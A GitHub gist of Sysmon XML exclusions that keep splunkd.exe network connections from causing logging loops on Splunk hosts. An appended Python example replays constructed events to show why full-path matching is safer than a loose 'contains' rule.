SecurityShrimp f8al

View GitHub Profile
@f8al
f8al / splunk.xml
Created October 30, 2018 14:19
Image exclusions to add to Sysmon configs to avoid logging loops when using Splunk
<!-- SECTION: Splunk-->
<!--COMMENT: exclude splunkd.exe from NetworkConnect (Event ID 3) logging on any host running a Universal Forwarder or a full Splunk install. Otherwise Sysmon logs each connection splunkd makes to the indexer on TCP 9997, the forwarder ships that event over a connection that Sysmon logs in turn, and so on: a log loop, turtles all the way down. These Image lines belong inside a <NetworkConnect onmatch="exclude"> rule. The "is" condition matches the full path, so add the real install path if Splunk lives somewhere other than the defaults below.-->
<Image condition="is">C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe</Image><!--Splunk Universal Forwarder-->
<Image condition="is">C:\Program Files\Splunk\bin\splunkd.exe</Image><!--Splunk daemon-->
<Image condition="is">C:\Program Files (x86)\SplunkUniversalForwarder\bin\splunkd.exe</Image><!--Splunk Universal Forwarder-->
<Image condition="is">C:\Program Files (x86)\Splunk\bin\splunkd.exe</Image><!--Splunk daemon-->
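The following is an added example, not part of the gist. It wraps the four Image lines above in the NetworkConnect exclude rule they are meant for (the wrapper and the schemaversion are assumptions) and replays constructed Event ID 3 records through Sysmon's match logic to confirm that only the real splunkd binaries are dropped. It also contrasts the gist's full-path `is` rules with a looser `contains splunkd.exe` rule, which would hide a renamed implant as well.

```python
"""Replay constructed Sysmon NetworkConnect events through an exclude rule
to check what the splunkd exclusions drop.  Added example, not gist code."""
import xml.etree.ElementTree as ET

# Constructed config: the gist's four <Image> lines inside a NetworkConnect
# exclude rule (assumed placement; the gist shows only the <Image> lines).
# The schemaversion value is an assumption.
SYSMON_CONFIG = r"""<Sysmon schemaversion="4.22">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="exclude">
        <Image condition="is">C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe</Image>
        <Image condition="is">C:\Program Files\Splunk\bin\splunkd.exe</Image>
        <Image condition="is">C:\Program Files (x86)\SplunkUniversalForwarder\bin\splunkd.exe</Image>
        <Image condition="is">C:\Program Files (x86)\Splunk\bin\splunkd.exe</Image>
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
"""

# Contrast: a loose rule that also hides any binary merely named splunkd.exe.
LOOSE_CONFIG = SYSMON_CONFIG.replace(
    r'<Image condition="is">C:\Program Files\Splunk\bin\splunkd.exe</Image>',
    '<Image condition="contains">splunkd.exe</Image>')


def load_rules(xml_text, event_type="NetworkConnect"):
    """Return (onmatch, [(field, condition, value), ...]) for one event type."""
    root = ET.fromstring(xml_text)
    node = root.find(f"./EventFiltering/RuleGroup/{event_type}")
    if node is None:
        raise ValueError(f"no {event_type} rule block in config")
    rules = [(c.tag, c.get("condition", "is"), (c.text or "").strip()) for c in node]
    return node.get("onmatch", "exclude"), rules


def field_matches(condition, actual, expected):
    """Sysmon filter conditions; Sysmon compares case-insensitively."""
    a, e = actual.lower(), expected.lower()
    if condition == "is":
        return a == e
    if condition == "is not":
        return a != e
    if condition == "contains":
        return e in a
    if condition == "begin with":
        return a.startswith(e)
    if condition == "end with":
        return a.endswith(e)
    if condition == "image":
        # 'image' matches either the full path or just the file name
        return a == e or a.rsplit("\\", 1)[-1] == e
    raise ValueError(f"unsupported condition: {condition}")


def should_log(event, onmatch, rules):
    """Apply one rule block to one event (dict keyed by Sysmon field names)."""
    hit = any(field_matches(cond, str(event.get(field, "")), value)
              for field, cond, value in rules)
    return not hit if onmatch == "exclude" else hit


# Constructed Event ID 3 samples; only the fields the rule inspects matter.
EVENTS = [
    {"Image": r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe",
     "DestinationPort": "9997", "label": "UF to indexer"},
    {"Image": r"c:\program files\splunk\bin\splunkd.exe",
     "DestinationPort": "9997", "label": "full install, lowercase path"},
    {"Image": r"C:\Users\Public\splunkd.exe",
     "DestinationPort": "9997", "label": "splunkd.exe outside install dir"},
    {"Image": r"D:\Splunk\bin\splunkd.exe",
     "DestinationPort": "9997", "label": "forwarder on a non-default drive"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationPort": "4444", "label": "unrelated outbound connection"},
]


def logged_labels(events=EVENTS, config=SYSMON_CONFIG):
    """Labels of the events Sysmon would still write under the given config."""
    onmatch, rules = load_rules(config)
    return [ev["label"] for ev in events if should_log(ev, onmatch, rules)]


if __name__ == "__main__":
    for label in logged_labels():
        print("logged (gist rules):", label)
    for label in logged_labels(config=LOOSE_CONFIG):
        print("logged (contains rule):", label)
```

With the gist's rules the two real splunkd paths are suppressed (the lowercase one too, since Sysmon matching is case-insensitive), while a splunkd.exe dropped in a user-writable directory and a forwarder installed on another drive both still produce Event ID 3 records; the first is the behaviour you want, the second is a reminder to add the real install path. The `contains` variant silences the rogue binary as well, which is why the full-path `is` form is the right one for a noise exclusion.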